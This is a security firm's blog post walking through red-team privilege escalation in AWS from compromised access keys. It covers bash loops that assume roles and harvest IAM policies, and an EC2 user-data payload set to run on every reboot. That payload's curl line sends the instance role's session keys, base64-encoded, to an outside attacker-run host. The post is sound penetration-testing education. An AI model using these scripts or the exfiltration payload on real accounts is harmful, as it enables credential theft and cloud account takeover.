Misadventures in AWS

By Christian Demko on 17 January, 2020

Christian Demko

 17 January, 2020

When performing security assessments of AWS environments, it is typical to do configuration reviews of AWS services.

Several well-known tools exist already that assist in these reviews and are best used with broad access to the environment. However, this kind of testing does not reflect the reality of a targeted attack. Should an attacker gain an initial foothold on AWS by compromising a set of access keys, they will need to use some creativity to identify security misconfigurations and potential attack paths.

This post describes techniques for AWS enumeration without additional tools and an example scenario of how these can be used to escalate privileges within an AWS environment. The scenario is based on real-world configurations WithSecure has seen during multiple AWS security assessments.

The Setup

Imagine a situation where you’ve compromised a set of credentials for AWS. After some basic enumeration, you find that the credentials don’t have any explicit permissions but they are able to impersonate other roles within the target’s environment (let’s assume you’ve found these role names elsewhere during a pentest):


Your goal is to leverage this access to escalate privileges and compromise the entire AWS environment.

First, you’ll want to get programmatic access to the AWS environment to start enumerating information from the various accounts. To do so, you can generate a set of access keys for each of the roles you can assume, then begin listing information about AWS resources from each role/account. Add these access keys to your AWS credentials file at ~/.aws/credentials. For this example, the profile will be called "base".

If MFA is enabled on the target account and required to assume additional roles, you’ll need to generate a set of session keys that are MFA-authenticated. The following bash one-liner can be used to generate these session keys with a registered MFA token:

BASE=`aws sts get-session-token --serial-number arn:aws:iam::1234567891:mfa/mymfatoken --token-code 654321 --profile base --output text --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]'`

echo $BASE | awk -F $'\t' '{print "\n[mfa]\noutput = json\nregion = eu-west-2\naws_access_key_id = " $1 "\naws_secret_access_key = " $2 "\naws_session_token = " $3}' >> ~/.aws/credentials

The command queries AWS to create long-duration session tokens (by default, 12 hours). The awk script extracts the three keys needed to create a profile, formats it, and inserts it into the credentials file under the name "mfa".

One you have these MFA-authenticated session keys (or if you never needed them), you’ll need to create session keys for each of the roles you can assume to start collecting data. The process was essentially the same for generating the first set of keys.

for i in $(cat appdev-roles.txt); do
  ROLE=`echo $i| cut -d '/' -f 2`
  aws sts assume-role --role-arn $i --role-session-name Test --profile mfa --output text --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' | awk -v name="$ROLE" -F $'\t' '{print "\n["name"]\noutput = json\nregion = eu-west-2\naws_access_key_id = " $1 "\naws_secret_access_key = " $2 "\naws_session_token = " $3}'
  unset ROLE >> ~/.aws/credentials

As with the previous ugly bash script, this script calls the AWS STS service to generate a set of temporary session keys (only good for about 1 hour by default for each role. An awk script formats the output into the profile structure for the `credentials` file, dynamically naming each profile after the role name. In this case, you would now have roles called "infrastructure-dev", "iam-dev", etc.

The Data Collection

Equipped with access keys for each role, you now want to enumerate data for different AWS services across each account. For example, if you want to get a list of all EC2 instances across the environment:

for i in $(cat ~/.aws/credentials | grep '\[' | cut -d ']' -f 1 | cut -d '[' -f 2 | grep '-appdev); do
  aws ec2 describe-instances --profile $i > ec2/$i-describe-instances

In this case, you’ll be leveraging the credentials file to extract a list of profile names (grepping for "-dev" as that was a string that existed in all the role names, conveniently) and calling the AWS CLI on each profile. To organize the data, you can create a sub-directory for each AWS service you’re interested in and redirect the output of these queries to files named after each profile. After running the above command, you’ll be left with a series of files called:

  • ec2/infrastructure-dev-describe-instances
  • ec2/iam-dev-describe-instances
  • ec2/admin-dev-describe-instances

You can get even fancier with these scripts. When enumerating IAM policies, it's not enough to just pull back a list of policies, but you must also look at the details for specific policy versions. In some cases, older versions of policies can be abused by attackers as well. The following script can be used to recursively collect the details of every version of every policy in every account. This requires first listing the available policies in each account, then listing the version numbers of each policy, then querying for the details of each version per policy.

for i in $(cat ~/.aws/credentials | grep '\[' | cut -d ']' -f 1 | cut -d '[' -f 2 | grep '-dev'); do
  for j in $(aws iam list-policies --profile $i | grep 'Arn' | cut -d '"' -f 4); do
    for k in $(aws iam list-policy-versions --policy-arn $j --profile $i | grep VersionId | cut -d '"' -f 4); do
      POLICY=`echo $j | tr '/' '_'`
      aws iam get-policy-version --policy-arn $j --version-id $k --profile $i > iam/policy-versions/$i-$POLICY-$k
      unset POLICY

Note: You may want to filter out AWS-managed policies by using grep to filter for only policies you’re interested in or to remove ones with "AWS".

After waiting quite a while for this to run, you’ll end up with files containing the permission sets of every version of every policy in the iam/policy-versions/ directory. This method is certainly not the most efficient and can generate a lot of empty files. Depending on the size of the environment, it may be beneficial to clean up these files quickly before continuing. A simple find command can be used to delete all files under a certain oddly small size, like 64 bytes.

The Analysis

With most of the AWS environment now presented in plaintext files, native Linux tools can be used to analyze the data. There are many things to look at to identify security issues, but for the sake of example, let’s focus on a single attack vector to escalate privileges within an AWS environment.

After enumerating IAM roles and policies, you may discover an administrative role that provides privileged access to most AWS resources – for example, an "infrastructure-admin" role with the AdministratorAccess managed policy attached to it. By grepping for this name through all of the IAM policies, you may find a reference to this role in exactly the way it could be abused by an attacker: a policy that allows assuming the admin role.

  "Effect": "Allow",
  "Action": "sts:AssumeRole",
  "Resource": [

Great! Now you can work backwards from this end goal to see if you can easily gain access to a role to which this policy is applied. Searching for the name of the policy you found above, you may find reference to a role. Grepping for the role, an instance profile. The instance profile, a set of live EC2 instances. If you’re able to execute code on these EC2 instances, or even start one yourself with the same instance profile, you meet the criteria for Rhino Security Labs’s AWS Privilege Escalation Method #3!

The Execution

Executing commands on an EC2 instance should be easy, especially if you can start one yourself. Add an SSH key to the instance and log in directly. In some cases, you may need to enumerate and exploit vulnerable services on the host to gain access. In other cases, direct network access may not be possible, and you’ll need to do everything through the AWS APIs.

Luckily, EC2 provides the ability to execute arbitrary bash scripts through the EC2 user data feature. When launching an instance for the first time, an AWS administrator can supply a script, usually a first-time configuration script, for the host. By default, these scripts only execute during first launch and this is only helpful if you can actually spin up your own EC2 instances. If you can, great! But you might only have the option to start and stop existing instances.

As it turns out, AWS supports the ability to execute user data scripts on every reboot of an EC2 instance. It's not something you'll find their documentation directly, but if you read carefully enough, they'll link you to the relevant blog post.

Long story short, you can provide something like the following to tell the EC2 instance to execute user scripts on every reboot of the instance. This might come in handy for someone who has permission to edit user data and reboot instances but cannot create new instances.

Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

- [scripts-user, always]

Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

curl http://ec2-my-own-aws-vps.us-east-2.compute.amazonaws.com/`curl -s | base64 | tr -d '\n' `

The script executes a curl command that queries the EC2 metadata for the session keys tied to a specific role applied to the instance. It base64 encodes the response, removes newline characters, and appends it to a basic GET request to an external EC2 instance running a simple HTTP server. By capturing this GET request, you can decode the session key information and reuse it to perform the rest of the privilege escalation attack.

The Conclusion

The tools that currently exist for doing AWS security assessments are valuable and this post is not meant to suggest otherwise. For example, CloudMapper from Duo Labs is a fantastic tool for extracting large amounts of metadata from AWS environments and would very likely automate everything described in this post. However, proper use of CloudMapper requires at least read-only access to all of your resources within AWS. This is great for white-box security assessments and audits but would not be used in a "red team"-style threat assessment. Furthermore, if your access to AWS is limited by time, you may only want to target collecting data from specific services.

Pacu, developed by Rhino Security Labs, is another great tool for automating many offensive security techniques and could easily replicate the privilege escalation attack described in this post. However, the tool cannot help provide context around the roles which can be targets for privilege escalation. This is clearly stated in their blog post as well:

Potential Impact: This attack would give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account.

Identification of a target role/instance profile for privilege escalation will have to be done manually. Once identified, Pacu should be able to carry out the rest of the attack just fine. By manually gathering and sifting through the data, you can discover your own path from beginning to end then use tools like Pacu to execute the attacks on it.

WithSecure recently released a tool to map roles and permission relationships within an AWS environment, called awspx. For attackers, this tool can be used to identify these routes of privilege escalation. For defenders, it can be used to stay ahead of these attackers and protect critical resources.

Tools are often built to automate certain kinds of offensive, or defensive, security assessment techniques but may not always be applicable in every situation. Where these tools may not work well or be intuitive enough to use, it may be necessary to fall back to some of these manual or semi-automated methods that are more flexible. Hopefully this post has provided some useful tips for adapting to kinds of situations.